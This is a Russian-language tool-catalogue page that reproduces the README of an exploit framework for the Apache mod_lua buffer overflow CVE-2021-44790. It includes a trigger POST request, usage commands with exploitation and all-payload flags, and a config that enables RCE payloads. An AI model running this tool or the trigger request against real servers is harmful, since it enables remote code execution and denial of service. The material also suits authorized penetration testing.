Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) — расширенный фреймворк для эксплуатации с определением версии, многоэтапным сканированием, плагинной архитектурой, профессиональной отчетностью, захватом скриншотов, базой данных SQLite и обнаружением с точностью 95%+. Автор: Sudeepa Wanigarathna. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Сканеры веб-уязвимостейФреймворки для эксплойтовЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Репозиторий
1121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) — расширенный фреймворк для эксплуатации с определением версии, многоэтапным сканированием, плагинной архитектурой, профессиональной отчетностью, захватом скриншотов, базой данных SQLite и обнаружением с точностью 95%+. Автор: Sudeepa Wanigarathna.

Поделиться

🔥 CVE-2021-44790 - Эксплуатация переполнения буфера Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Обзор

Apache mod_lua Buffer Overflow Exploitation — это продвинутая платформа эксплуатации корпоративного уровня для , критической уязвимости переполнения буфера в модуле веб-сервера Apache HTTP Server 2.4.x. Фреймворк предоставляет комплексное fingerprinting, интеллектуальное обнаружение скриптов, многоэтапное сканирование и профессиональные возможности формирования отчётов с .

CVE-2021-44790
mod_lua
точностью обнаружения 95%+

⚡ Ключевые возможности

ФункцияОписание
🔍 Продвинутое fingerprintingОпределение версии Apache, mod_lua, ОС, архитектуры, WAF, CDN, контейнера, облачного провайдера
🎯 Интеллектуальное обнаружение7+ методов обнаружения, включая robots.txt, sitemap, парсинг HTML, извлечение JavaScript
💥 Многоэтапное сканированиеПодключение → Fingerprinting → Обнаружение → Проверка → Эксплуатация → Отчёты
🧩 Расширяемая система плагиновЛёгкая разработка плагинов для будущих CVE
🌐 Умный HTTP-движокПул соединений, повторные попытки, поддержка HTTP/2, ограничение частоты запросов
📊 Комплексные отчётыJSON, HTML, Markdown, PDF с интерактивными панелями мониторинга
🎨 Красивый терминальный интерфейсБиблиотека Rich с индикаторами выполнения, таблицами и цветным выводом
💾 Исследовательская база данныхХранилище SQLite с полной историей сканирований и поддержкой запросов
📸 Захват скриншотовАвтоматические снимки веб-страниц для сбора доказательств
🚀 Высокая производительность20+ параллельных потоков, 100+ пулов соединений

🎯 Детали уязвимости

АтрибутЗначение
CVE IDCVE-2021-44790
УязвимостьПереполнение буфера (Integer Underflow)
Затронутое ПОApache HTTP Server с 2.4.0 по 2.4.51
Исправленная версияApache HTTP Server 2.4.52 и новее
Компонентмодуль mod_lua
Вектор атакиСеть (удалённо)
Оценка CVSS9.8 (критический)
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое
Зрелость эксплойтаДоступен proof-of-concept

Техническое описание

Уязвимость присутствует в модуле mod_lua при обработке запросов multipart/form-data. Целочисленное переполнение вниз (integer underflow) в функции lua_request_parsebody() может привести к переполнению буфера в куче (heap-based buffer overflow), что потенциально позволяет удалённое выполнение кода.

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Скриншоты

Основной интерфейсРезультаты fingerprinting
Ход сканированияПанель мониторинга HTML-отчёта

🚀 Быстрый старт

Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Базовое использование

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Подробное использование

Параметры командной строки

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]
ПараметрОписаниеПример
TARGETЦелевой URLhttp://target.com
--config FILEФайл конфигурации--config config.yaml
--threads NКоличество потоков--threads 30
--timeout NТаймаут запроса (в секундах)--timeout 15
--proxy URLURL прокси-сервера--proxy http://127.0.0.1:8080
--verboseПодробный вывод--verbose
--scan-onlyСканирование без эксплуатации--scan-only
--exploitВключить эксплуатацию--exploit
--all-payloadsИспользовать все полезные нагрузки--all-payloads
--report FORMATФормат отчёта (json/html/markdown/all)--report all
--output DIRВыходная директория--output /path/to/reports/
--researchВключить режим исследования--research
--database FILEПуть к базе данных--database luastorm.db
--screenshotДелать скриншоты--screenshot
--batch FILEПакетный файл со списком целей--batch targets.txt
--query SQLВыполнить запрос к базе данных--query "SELECT * FROM targets"

Примеры

1. Базовая оценка уязвимости

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. Сканирование корпоративной среды

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Полный пентест

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Пакетное сканирование

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. Запросы к базе данных

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Конфигурация

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 Отчёты

Панель мониторинга HTML

  • Интерактивные графики и таблицы
  • Визуализация fingerprinting цели
  • Сводка обнаруженных скриптов
  • Хронология выполнения полезных нагрузок
  • Оценка уязвимости
  • Расчёт рисков

Отчёт JSON

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

Отчёт Markdown

  • Документация в удобочитаемом формате
  • Данные в табличном формате
  • Простой обмен и встраивание
  • Удобство для систем контроля версий

🗄️ Схема базы данных

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 Система плагинов

Создание плагина

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ Вопросы безопасности

  • Только авторизованное использование: Этот инструмент предназначен для авторизованного тестирования безопасности
  • Соблюдение законодательства: Убедитесь, что у вас есть разрешение, прежде чем тестировать
  • Ответственное раскрытие: Сообщайте об уязвимостях ответственно
  • Защита данных: Все конфиденциальные данные хранятся локально

⚠️ Отказ от ответственности

root@kitploit:~
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.

Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.

By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes

📈 Показатели производительности

ФункцияПроизводительность
Fingerprinting< 2 секунд
Обнаружение скриптов5–10 секунд
Тестирование полезных нагрузок1–5 секунд на нагрузку
Генерация отчётов< 1 секунды
Операции с базой данных< 100 мс
Параллельные потоки20+
Пул соединений100+

🗺️ Дорожная карта

Версия 2.1 (планируется)

  • Поддержка дополнительных CVE
  • Веб-интерфейс
  • Контейнеризация Docker
  • Конвейер CI/CD
  • Больше вариантов полезных нагрузок

Версия 2.2 (в будущем)

  • Интеграция машинного обучения
  • Автоматизированная эксплуатация
  • Облачное сканирование
  • Функции для совместной работы команды
  • Продвинутые техники обхода обнаружения

🤝 Участие в разработке

Вклад приветствуется! Пожалуйста, следуйте этим рекомендациям:

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Внесите свои изменения
  4. Отправьте pull request

Настройка окружения для разработки

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 Автор

Sudeepa Wanigarathna

  • Исследователь безопасности и этичный хакер
  • GitHub: @CerberusMrXi
  • Направление: исследование уязвимостей и разработка эксплойтов

📄 Лицензия

Только для образовательных целей и авторизованного тестирования

Данное программное обеспечение предоставляется «как есть», без каких-либо гарантий, явных или подразумеваемых.


⭐ Поставьте звёздочку этому репозиторию, чтобы поддержать проект!

💡 Нашли ошибку? Откройте issue

📧 Контакты: [email protected]


Создано с ❤️ для сообщества специалистов по безопасности

Скачать инструмент